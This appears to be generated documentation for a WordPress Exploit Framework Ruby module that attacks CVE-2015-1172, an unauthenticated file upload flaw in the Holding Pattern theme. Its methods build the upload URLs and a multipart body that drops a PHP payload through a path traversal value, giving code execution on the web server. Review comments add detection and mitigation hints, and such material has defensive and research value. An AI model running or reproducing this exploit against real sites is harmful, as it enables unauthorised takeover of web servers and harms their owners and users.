class Wpxf::Exploit::HoldingPatternShellUpload

Public Class Methods

new()
# File lib/wpxf/modules/exploit/shell/holding_pattern_shell_upload.rb, line 8
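# Registers this module's metadata (name, description, credits, references
# and disclosure date) once the parent initializer has run.
#
# The description names the script as upload-file.php so that it agrees with
# the path assembled in uploader_url; the previous text said upload_file.php,
# which does not match the endpoint the module actually requests.
#
# NOTE(review): the description states that all versions of the theme are
# affected, so there appears to be no fixed release to upgrade to. Removing
# the theme or blocking direct requests to admin/upload-file.php is the
# practical mitigation. Confirm against the referenced advisories.
def initialize
  super

  update_info(
    name: 'Holding Pattern Theme Shell Upload',
    desc: 'This module exploits a file upload vulnerability in all versions '\
          'of the Holding Pattern theme found in the upload-file.php script '\
          'which contains no session or file validation. It allows '\
          'unauthenticated users to upload files of any type and '\
          'subsequently execute PHP scripts in the context of the '\
          'web server.',
    author: [
      'Alexander Borg', # Vulnerability disclosure
      'rastating'       # WPXF module
    ],
    references: [
      ['CVE', '2015-1172'],
      ['WPVDB', '7784']
    ],
    date: 'Feb 11 2015'
  )
end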

Public Instance Methods

check()
# File lib/wpxf/modules/exploit/shell/holding_pattern_shell_upload.rb, line 31
# Runs the framework's readme-based theme version check for this theme and
# returns whatever that helper returns.
#
# NOTE(review): the helper is defined outside this file; presumably it reads
# the theme's readme to decide whether the install is in the affected range.
# Confirm against its implementation.
def check
  theme_slug = 'holding_pattern'
  check_theme_version_from_readme(theme_slug)
end
payload_body_builder(payload_name)
# File lib/wpxf/modules/exploit/shell/holding_pattern_shell_upload.rb, line 47
# Assembles the multipart request body sent to the theme's upload script.
#
# The file part's field name is derived from the resolved address of
# target_host, passed through Utility::Text.md5. The fixed 'upload_path' value
# is the Base64 encoding of '../uploads'.
#
# NOTE(review): for detection, a POST to admin/upload-file.php carrying an
# 'upload_path' field is the request shape this body produces. Hedged: the
# exact format of the digest returned by Utility::Text.md5 is not visible here.
#
# @param payload_name [String] file name given to the uploaded part
# @return [Utility::BodyBuilder] the populated body builder
def payload_body_builder(payload_name)
  resolved_address = IPSocket.getaddress(target_host)
  file_field = Utility::Text.md5(resolved_address)

  Utility::BodyBuilder.new.tap do |body|
    body.add_file_from_string(file_field, payload.encoded, payload_name)
    body.add_field('upload_path', 'Li4vdXBsb2Fkcw==')
  end
end
plugin_url()
# File lib/wpxf/modules/exploit/shell/holding_pattern_shell_upload.rb, line 35
# Base URL of the theme directory. Despite the method name, the path is built
# under the themes root (wordpress_url_themes), not the plugins root.
#
# @return the value produced by normalize_uri for the theme directory
def plugin_url
  theme_slug = 'holding_pattern'
  normalize_uri(wordpress_url_themes, theme_slug)
end
uploader_url()
# File lib/wpxf/modules/exploit/shell/holding_pattern_shell_upload.rb, line 43
# URL of the theme's upload script, admin/upload-file.php under the theme
# directory. This is the endpoint to restrict or monitor on affected sites.
#
# @return the value produced by normalize_uri for the upload script
def uploader_url
  script_segments = %w[admin upload-file.php]
  normalize_uri(plugin_url, *script_segments)
end
uploads_url()
# File lib/wpxf/modules/exploit/shell/holding_pattern_shell_upload.rb, line 39
# URL of the theme's uploads directory (note the trailing slash), where files
# accepted by the upload script end up according to the 'upload_path' value
# used in payload_body_builder.
#
# @return the value produced by normalize_uri for the uploads directory
def uploads_url
  uploads_segment = 'uploads/'
  normalize_uri(plugin_url, uploads_segment)
end